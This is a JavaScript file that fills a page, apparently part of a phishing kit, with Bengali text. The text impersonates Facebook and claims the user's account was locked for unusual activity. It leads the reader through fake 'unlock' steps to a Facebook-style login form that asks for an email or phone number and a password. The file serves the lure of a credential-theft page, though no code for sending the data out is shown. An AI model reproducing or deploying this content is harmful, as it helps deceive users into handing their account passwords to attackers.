var mainHeader = document.querySelector(".home-main-header .home-heading");
var mainParagraph = document.querySelector(".home-mainparagrph .home-text");
var lockedHeader = document.querySelector(".home-lockedheader .home-text1");
var lockedParagraph = document.querySelector(".home-lockedinfobox .home-container6 .home-text5");
var footerParagraph = document.querySelector(".home-main-card .home-container7 .home-text6");
var getStarted = document.querySelector(".home-main-card .home-link");
var nextHeader = document.querySelector(".home-next-card .home-unlock-header .home-text");
var fristLineHeader = document.querySelector(".home-f-line .home-text03");
var fristLineParagraph = document.querySelector(".home-f-line .home-text05 span"); 
var secoundLineHeader = document.querySelector(".home-s-line .home-text09"); 
var thirdLineHeader = document.querySelector(".home-t-line .home-text12"); 
var nextButton = document.querySelector(".home-next-buttons .home-button1");
var backButton = document.querySelector(".home-next-buttons .home-button");
var logHeading = document.querySelector(".home-log-card .dlog .home-heading");
var logAlert = document.querySelector(".home-log-card .home-alert");
var logAlert2 = document.getElementById("alert");
var userInput = document.querySelector(".home-mail");
var passInput = document.querySelector(".home-pass");
var logButton = document.querySelector(".home-submit"); 
var or = document.querySelector(".home-or");
var createButton = document.querySelector(".home-creat-new");


mainHeader.innerHTML ="আপনার অ্যাকাউন্ট লক করা হয়েছে";
mainParagraph.innerHTML ="আমরা আপনার অ্যাকাউন্টে অস্বাভাবিক কার্যকলাপ দেখেছি। এর অর্থ হতে পারে যে কেউ আপনার অজান্তেই আপনার অ্যাকাউন্ট ব্যবহার করেছে।";
lockedHeader.innerHTML ="10 নভেম্বর, 2021 এ অ্যাকাউন্ট লক করা হয়েছে";
lockedParagraph.innerHTML ="আপনাকে রক্ষা করার জন্য, আপনার প্রোফাইল Facebook-এ লোকেদের কাছে দৃশ্যমান নয় এবং আপনি আপনার অ্যাকাউন্ট ব্যবহার করতে পারবেন না৷";
footerParagraph.innerHTML ="আপনার অ্যাকাউন্ট আনলক করার জন্য আমরা আপনাকে কিছু পদক্ষেপের মাধ্যমে নিয়ে যাব।";
getStarted.innerHTML ="এবার শুরু করা যাক";
nextHeader.innerHTML ="কিভাবে আপনার অ্যাকাউন্ট আনলক করবেন";
fristLineHeader.innerHTML ="নিশ্চিত করুন যে এটি আপনার অ্যাকাউন্ট";
fristLineParagraph.innerHTML ="কারণ অন্য কারো অ্যাক্সেস থাকতে পারে, আমরা আরও এগিয়ে যাওয়ার আগে আমাদের নিশ্চিত করতে হবে যে আপনি এই অ্যাকাউন্টের মালিক৷";
secoundLineHeader.innerHTML ="আপনার লগইন বিশদ সুরক্ষিত";
thirdLineHeader.innerHTML ="আপনার অ্যাকাউন্ট আনলক করা হবে";
nextButton.innerHTML ="পরবর্তী";
backButton.innerHTML ="পেছনে";
logHeading.innerHTML ="ফেসবুকে লগ ইন করুন";
logAlert.innerHTML ="প্রথমে আপনাকে প্রবেশ করতে হবে";
logAlert2.innerHTML ="প্রথমে আপনাকে প্রবেশ করতে হবে";
userInput.setAttribute("placeholder" , "ইমেল ঠিকানা বা ফোন নম্বর");
passInput.setAttribute("placeholder" , "পাসওয়ার্ড");
logButton.innerHTML ="প্রবেশ করুন";
or.innerHTML ="বা";
createButton.innerHTML ="নতুন অ্যাকাউন্ট তৈরি";
